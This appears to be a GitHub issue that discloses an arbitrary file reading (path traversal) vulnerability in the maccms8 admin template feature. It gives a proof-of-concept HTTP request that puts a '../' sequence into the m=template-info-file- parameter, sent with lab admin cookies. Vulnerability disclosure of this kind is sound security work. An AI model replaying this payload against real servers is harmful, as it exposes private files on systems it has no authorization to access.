maccmspro/maccms8

Background template arbitrary file reading vulnerability

Closed this issue · 0 comments

Vulnerability Product:maccms8
Vulnerability type:file reading vulnerability
Vulnerability Details:
Background template arbitrary file reading vulnerability

poc

GET /admin/index.php?m=template-info-file-../template/default/html/1.php HTTP/1.1
Host: 192.168.3.129:8091
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.3.129:8091/admin/index.php?m=template-list-path-../template/default/html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cms_ds_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJtYXN0ZXIiLCJpc3MiOiJKUkNtcyIsInN1YiI6IkpSQ21zLURhc2hib2FyZCIsImV4cCI6MTY5ODgxOTIzNn0.IbsTyYy5sJZlBDtgIiOb9G6idpa9b2LkWioRlSMlSEA; configtab=4; PHPSESSID=7nt0ps450m3j96ond3v3tlsin7; adminlevels=b%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj
Connection: close

image